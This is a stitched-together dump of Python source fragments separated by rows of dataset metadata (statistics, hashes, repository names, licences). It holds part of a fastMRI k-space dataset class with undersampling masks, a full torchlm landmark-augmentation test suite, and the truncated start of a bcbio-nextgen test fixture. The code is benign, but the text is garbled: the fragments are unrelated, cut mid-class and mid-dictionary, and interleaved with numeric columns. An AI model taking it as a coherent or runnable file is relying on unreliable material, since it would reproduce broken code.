        # Get locations of ACS lines
        # !!! Assumes k-space is even sized and centered, true for fastMRI
        center_line_idx = np.arange((total_lines - acs_lines) // 2,
                             (total_lines + acs_lines) // 2)

        # Find remaining candidates
        outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
        if pattern == 'random':
            # Sample remaining lines from outside the ACS at random
            random_line_idx = np.random.choice(outer_line_idx,
                       size=int(num_sampled_lines - acs_lines), replace=False)
        elif pattern == 'equispaced':
            # Sample equispaced lines
            # !!! Only supports integer for now
            random_line_idx = outer_line_idx[::int(R)]
        else:
            raise NotImplementedError('Mask Pattern not implemented yet...')

        # Create a mask and place ones at the right locations
        mask = np.zeros((total_lines))
        mask[center_line_idx] = 1.
        mask[random_line_idx] = 1.

        return mask

    # Cropping utility - works with numpy / tensors
    def _crop(self, x, wout, hout):
        """Center-crop the last two axes of ``x`` to (wout, hout)."""
        w, h = x.shape[-2:]
        x1 = int(np.ceil((w - wout) / 2.))
        y1 = int(np.ceil((h - hout) / 2.))
        return x[..., x1:x1+wout, y1:y1+hout]

    def _rotatecomplex(self, a, angle, reshape=True):
        """Rotate a complex array by rotating real and imaginary parts
        separately (scipy's rotate does not handle complex input)."""
        r = rotate(a.real,angle,reshape=reshape,mode='wrap')
        i = rotate(a.imag,angle,reshape=reshape,mode='wrap')
        return r+1j*i

    def __getitem__(self, idx):
        """Return a sample dict (mvue, maps, masked k-space 'ground_truth',
        mask, scale_factor, indices, source name) for slice index ``idx``."""
        # Convert to numerical
        if torch.is_tensor(idx):
            idx = idx.tolist()

        # Load maps for specific scan and slice
        with h5py.File(os.path.join(self.project_dir, self.maps_file), 'r') as data:
            # Get maps
            maps = np.asarray(data['maps'])[idx]

        # Load raw data for specific scan and slice
        with h5py.File(os.path.join(self.project_dir, self.raw_file), 'r') as data:
            # Get k-space for this slice
            slice_ksp = np.asarray(data['ksp'])[idx]

        # # rotate kspace by 90 degrees
        if self.rotate:
            gt_ksp = slice_ksp.copy()
            for c,coil in enumerate(slice_ksp):
                gt_ksp[c,:,:] = self._rotatecomplex(coil,90) # the kspace is rotated, so werotate it back to the original format
        else:
            gt_ksp = slice_ksp.copy()

        # pad readout in image domain
        x = sp.ifft(gt_ksp, axes=(-1,))
        x = sp.resize(x, (x.shape[0], x.shape[1], self.image_size[1]))
        # pad phase-encode in kspace domain
        gt_ksp = sp.fft(x, axes=(-1,))
        gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0], self.image_size[1]))

        # Crop extra lines and reduce FoV by half in readout
        # (maps get the equivalent pad pipeline so they stay aligned)
        maps = sp.fft(maps, axes=(-1, -2)) # These are now maps in k-space
        maps = sp.ifft(maps, axes=(-1,))
        maps = sp.resize(maps, (
            maps.shape[0], maps.shape[1], self.image_size[1]))
        maps = sp.fft(maps, axes=(-1,))
        # pad phase-encode in kspace domain
        maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
                                self.image_size[1]))
        maps = sp.ifft(maps, axes=(-1, -2)) # Finally convert back to image domain

        # find mvue image
        mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))

        # # Load MVUE slice from specific scan
        mvue_file = os.path.join(self.input_dir,str(idx))

        # !!! Removed ACS-based scaling if handled on the outside
        scale_factor = 1.

        # Scale data
        mvue = mvue / scale_factor
        gt_ksp = gt_ksp / scale_factor

        # Compute ACS size based on R factor and sample size
        if self.orientation == 'horizontal':
            total_lines = gt_ksp.shape[-2]
        elif self.orientation == 'vertical':
            total_lines = gt_ksp.shape[-1]
        else:
            raise NotImplementedError

        if 1 < self.R <= 6:
            # Keep 8% of center samples
            acs_lines = np.floor(0.08 * total_lines).astype(int)
        else:
            # Keep 4% of center samples
            acs_lines = np.floor(0.04 * total_lines).astype(int)

        # Get a mask
        mask = self._get_mask(acs_lines, total_lines,
                              self.R, self.pattern)

        # Mask k-space
        if self.orientation == 'vertical':
            gt_ksp *= mask[None, None, :]
        elif self.orientation == 'horizontal':
            gt_ksp *= mask[None, :, None]
        else:
            raise NotImplementedError

        # Output
        sample = {
            'mvue': mvue,
            'maps': maps,
            'ground_truth': gt_ksp,
            'mask': mask,
            'scale_factor': scale_factor,
            # Just for feedback
            'scan_idx': 1,
            'slice_idx': idx+1,
            'mvue_file': mvue_file}
        return sample
| 38.734908
| 128
| 0.559527
| 3,869
| 29,516
| 4.095115
| 0.075989
| 0.024615
| 0.018935
| 0.025625
| 0.919149
| 0.899773
| 0.885256
| 0.874085
| 0.864681
| 0.84745
| 0
| 0.017085
| 0.329753
| 29,516
| 761
| 129
| 38.785808
| 0.783804
| 0.330838
| 0
| 0.776382
| 0
| 0
| 0.036089
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055276
| false
| 0
| 0.032663
| 0.012563
| 0.143216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30f4e51e9457320f48033005baae3d7aa65016b1
| 21,442
|
py
|
Python
|
test/transforms.py
|
DefTruth/landmarksaug
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 56
|
2022-02-08T06:45:02.000Z
|
2022-03-27T14:03:08.000Z
|
test/transforms.py
|
DefTruth/pylandmarks
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 9
|
2022-02-15T12:32:34.000Z
|
2022-03-31T14:12:06.000Z
|
test/transforms.py
|
DefTruth/pylandmarks
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 8
|
2022-02-15T09:17:51.000Z
|
2022-03-27T14:03:08.000Z
|
import cv2
import numpy as np
import torchvision
# import albumentations
from torch import Tensor
from typing import Tuple
import torchlm
def callable_array_noop(
    img: np.ndarray,
    landmarks: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
    """Example of a bindable array transform.

    Performs no geometric change; only normalizes dtypes — the image is
    cast to ``uint32`` and the landmarks to ``float32``.
    """
    out_img = img.astype(np.uint32)
    out_landmarks = landmarks.astype(np.float32)
    return out_img, out_landmarks
def callable_tensor_noop(
    img: Tensor,
    landmarks: Tensor
) -> Tuple[Tensor, Tensor]:
    """Example of a bindable tensor transform: a pure pass-through that
    returns both inputs unchanged."""
    return img, landmarks
def test_torchlm_transforms_pipeline():
    """Visual check of a full mixed pipeline: native torchlm transforms,
    bound torchvision image-only transforms, and bound custom callables."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        # native torchlm transforms
        torchlm.LandmarksRandomScale(prob=0.5),
        torchlm.LandmarksRandomTranslate(prob=0.5),
        torchlm.LandmarksRandomShear(prob=0.5),
        torchlm.LandmarksRandomMask(prob=0.5),
        torchlm.LandmarksRandomBlur(kernel_range=(5, 25), prob=0.5),
        torchlm.LandmarksRandomBrightness(prob=0.),
        torchlm.LandmarksRandomRotate(40, prob=0.5, bins=8),
        torchlm.LandmarksRandomCenterCrop((0.5, 1.0), (0.5, 1.0), prob=0.5),
        # bind torchvision image-only transforms, each with a bind prob
        torchlm.bind(torchvision.transforms.GaussianBlur(kernel_size=(5, 25)), prob=0.5),
        torchlm.bind(torchvision.transforms.RandomAutocontrast(p=0.5)),
        torchlm.bind(torchvision.transforms.RandomAdjustSharpness(sharpness_factor=3, p=0.5)),
        # albumentations transforms can be bound the same way, e.g.
        # torchlm.bind(albumentations.ColorJitter(p=0.5)) or dual transforms
        # such as albumentations.RandomCrop / RandomScale / Rotate.
        # bind custom callable array/Tensor functions
        torchlm.bind(callable_array_noop, bind_type=torchlm.BindEnum.Callable_Array, prob=0.5),
        torchlm.bind(callable_tensor_noop, bind_type=torchlm.BindEnum.Callable_Tensor, prob=0.5),
        torchlm.LandmarksResize((256, 256)),
        torchlm.LandmarksNormalize(),
        torchlm.LandmarksToTensor(),
        torchlm.LandmarksToNumpy(),
        torchlm.LandmarksUnNormalize()
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_mask():
    """Visual check for LandmarksRandomMask / LandmarksRandomMaskMixUp."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    with_alpha = True
    save_path = f"./logs/2_wflw_mask_alpha_{with_alpha}_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    # MixUp variant blends the mask with alpha; plain variant hard-masks.
    mask_op = (torchlm.LandmarksRandomMaskMixUp(prob=1.)
               if with_alpha else torchlm.LandmarksRandomMask(prob=1.))
    transform = torchlm.LandmarksCompose([
        mask_op,
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_patches_mixup():
    """Visual check for LandmarksRandomPatches / LandmarksRandomPatchesMixUp."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    with_alpha = True
    save_path = f"./logs/2_wflw_patches_mixup_alpha_{with_alpha}_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    # MixUp variant blends patches with alpha; plain variant pastes them.
    patches_op = (torchlm.LandmarksRandomPatchesMixUp(alpha=0.5, prob=1.)
                  if with_alpha else torchlm.LandmarksRandomPatches(prob=1.))
    transform = torchlm.LandmarksCompose([
        patches_op,
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_backgrounds_mixup():
    """Visual check for LandmarksRandomBackground / ...BackgroundMixUp."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    with_alpha = True
    save_path = f"./logs/2_wflw_backgrounds_mixup_alpha_{with_alpha}_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    # MixUp variant blends the background with alpha; plain variant replaces it.
    background_op = (torchlm.LandmarksRandomBackgroundMixUp(alpha=0.5, prob=1.)
                     if with_alpha else torchlm.LandmarksRandomBackground(prob=1.))
    transform = torchlm.LandmarksCompose([
        background_op,
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_center_crop():
    """Visual check for LandmarksRandomCenterCrop."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_center_crop_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        # NOTE(review): (0.5, 0.1) is a decreasing range, unlike the
        # (0.5, 1.0) used elsewhere in this file — confirm torchlm accepts it.
        torchlm.LandmarksRandomCenterCrop(width_range=(0.5, 0.1), height_range=(0.5, 0.1), prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_horizontal():
    """Visual check for LandmarksRandomHorizontalFlip."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_horizontal_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomHorizontalFlip(prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_rotate():
    """Visual check for LandmarksRandomRotate."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_rotate_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomRotate(angle=80, prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_shear():
    """Visual check for LandmarksRandomShear."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_shear_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomShear(prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_blur():
    """Visual check for LandmarksRandomBlur.

    Fix: the asset paths were "./2.jpg" / "./2.txt", inconsistent with every
    other test in this file, which loads from "./assets/"; corrected here.

    Note: unlike the other tests, Resize runs *before* the blur so the
    kernel range applies to the fixed 256x256 size.
    """
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    img_path = "./assets/2.jpg"
    anno_path = "./assets/2.txt"
    save_path = f"./logs/2_wflw_blur_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread(img_path)[:, :, ::-1].copy()  # RGB
    with open(anno_path, 'r') as fr:
        lm_info = fr.readlines()[0].strip('\n').split(' ')
    landmarks = [float(x) for x in lm_info[:196]]
    landmarks = np.array(landmarks).reshape(98, 2)  # (98, 2) for WFLW
    # Turn on the verbose global switches while eyeballing transform output.
    torchlm.set_transforms_debug(True)
    torchlm.set_transforms_logging(True)
    torchlm.set_autodtype_logging(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksResize((256, 256)),
        torchlm.LandmarksRandomBlur(kernel_range=(5, 35), prob=1.)
    ])
    trans_img, trans_landmarks = transform(img, landmarks)
    new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
    cv2.imwrite(save_path, new_img[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    torchlm.set_transforms_debug(False)
    torchlm.set_transforms_logging(False)
    torchlm.set_autodtype_logging(False)
def test_torchlm_transform_translate():
    """Visual check for LandmarksRandomTranslate."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_translate_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomTranslate(prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_brightness():
    """Visual check for LandmarksRandomBrightness."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_brightness_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomBrightness(prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_hsv():
    """Visual check for LandmarksRandomHSV."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_hsv_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomHSV(prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_scale():
    """Visual check for LandmarksRandomScale with aspect-preserving resize."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_scale_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        # NOTE(review): the lower bound -0.5 is presumably a relative scale
        # offset (shrink), not a negative absolute factor — confirm against
        # torchlm's LandmarksRandomScale semantics.
        torchlm.LandmarksRandomScale(scale=(-0.5, 1.5), prob=1.),
        torchlm.LandmarksResize((256, 256), keep_aspect=True)
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
def test_torchlm_transform_align():
    """Visual check for LandmarksRandomAlign: rotate, then re-align by eyes."""
    print(f"torchlm version: {torchlm.__version__}")
    seed = np.random.randint(0, 1000)
    np.random.seed(seed)
    save_path = f"./logs/2_wflw_align_{seed}.jpg"
    # Load the image as RGB and the 98-point WFLW annotation (x,y pairs).
    img = cv2.imread("./assets/2.jpg")[:, :, ::-1].copy()
    with open("./assets/2.txt", 'r') as f:
        fields = f.readlines()[0].strip('\n').split(' ')
    landmarks = np.array([float(v) for v in fields[:196]]).reshape(98, 2)
    # Save the untouched annotated image for side-by-side comparison.
    # NOTE(review): "orginal" typo is preserved — it is a runtime filename.
    org_img = torchlm.draw_landmarks(img, landmarks, circle=4)
    cv2.imwrite("logs/2_wflw_orginal.jpg", org_img[:, :, ::-1])
    # Turn on the verbose global switches while eyeballing transform output.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(True)
    transform = torchlm.LandmarksCompose([
        torchlm.LandmarksRandomRotate(80, prob=1.),
        # WFLW indices 96/97 are used as the eye reference points here.
        torchlm.LandmarksRandomAlign(eyes_index=(96, 97), prob=1.),
        torchlm.LandmarksResize((256, 256))
    ])
    out_img, out_landmarks = transform(img, landmarks)
    vis = torchlm.draw_landmarks(out_img, out_landmarks, circle=2)
    cv2.imwrite(save_path, vis[:, :, ::-1])
    # Restore the quiet global state expected during real training runs.
    for switch in (torchlm.set_transforms_debug,
                   torchlm.set_transforms_logging,
                   torchlm.set_autodtype_logging):
        switch(False)
if __name__ == "__main__":
    print(torchlm.albumentations_is_available())
    # Run every visual-check case, preserving the original order.
    for case in (
        test_torchlm_transforms_pipeline,
        test_torchlm_transform_mask,
        test_torchlm_transform_patches_mixup,
        test_torchlm_transform_backgrounds_mixup,
        test_torchlm_transform_center_crop,
        test_torchlm_transform_horizontal,
        test_torchlm_transform_rotate,
        test_torchlm_transform_shear,
        test_torchlm_transform_blur,
        test_torchlm_transform_translate,
        test_torchlm_transform_brightness,
        test_torchlm_transform_hsv,
        test_torchlm_transform_scale,
        test_torchlm_transform_align,
    ):
        case()
| 34.752026
| 100
| 0.682725
| 2,843
| 21,442
| 4.931762
| 0.066479
| 0.05991
| 0.07988
| 0.049925
| 0.852935
| 0.827402
| 0.803937
| 0.797375
| 0.795806
| 0.795806
| 0
| 0.032434
| 0.18613
| 21,442
| 616
| 101
| 34.808442
| 0.771016
| 0.119345
| 0
| 0.765403
| 0
| 0
| 0.080143
| 0.043932
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037915
| false
| 0
| 0.014218
| 0.004739
| 0.056872
| 0.035545
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5034ae6f6a1d127e8a12fff5c192ed23781b96d
| 13,077
|
py
|
Python
|
tests/unit/data.py
|
a113n/bcbio-nextgen
|
1d4afef27ad2e84a4ecb6145ccc5058f2abb4616
|
[
"MIT"
] | 418
|
2015-01-01T18:21:17.000Z
|
2018-03-02T07:26:28.000Z
|
tests/unit/data.py
|
ahmedelhosseiny/bcbio-nextgen
|
b5618f3c100a1a5c04bd5c8acad8f96d0587e41c
|
[
"MIT"
] | 1,634
|
2015-01-04T11:43:43.000Z
|
2018-03-05T18:06:39.000Z
|
tests/unit/data.py
|
ahmedelhosseiny/bcbio-nextgen
|
b5618f3c100a1a5c04bd5c8acad8f96d0587e41c
|
[
"MIT"
] | 218
|
2015-01-26T05:58:18.000Z
|
2018-03-03T05:50:05.000Z
|
# Read-group naming fixture; the same mapping appears again as
# DATA['rgnames'] below.
NAMES = {
    'lane': 'Test1',
    'lb': None,  # library field intentionally unset in this fixture
    'pu': 'Test1',
    'sample': 'Test1',
    'rg': 'Test1',
    'pl': 'illumina'
}
# Fixture: one sample/lane dict in the shape bcbio-nextgen carries through
# an RNA-seq run. All paths point into the bcbio test tree; presumably
# consumed by unit tests needing a realistic payload — TODO confirm callers.
DATA = {
    # Trimmed paired-end FASTQ inputs (R1 / R2).
    'files': [
        '/bcbio-nextgen/tests/test_automated_output/trimmed/1_1_Test1.trimmed.fq.gz',
        '/bcbio-nextgen/tests/test_automated_output/trimmed/1_2_Test1.trimmed.fq.gz'
    ],
    # Working and lookup directories for the run.
    'dirs': {
        'config': '/bcbio-nextgen/tests/test_automated_output',
        'fastq': '/bcbio-nextgen/tests/data/test_fusion',
        'work': '/bcbio-nextgen/tests/test_automated_output',
        'flowcell': '/bcbio-nextgen/tests/data/test_fusion',
        'galaxy': '/bcbio-nextgen/tests/data/automated'
    },
    'lane': '1',
    'description': 'Test1',
    # Reference genome artifacts (hg19): context BEDs, FASTA, STAR index, RTG SDF.
    'reference': {
        'genome_context': [
            '/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test.bed.gz',
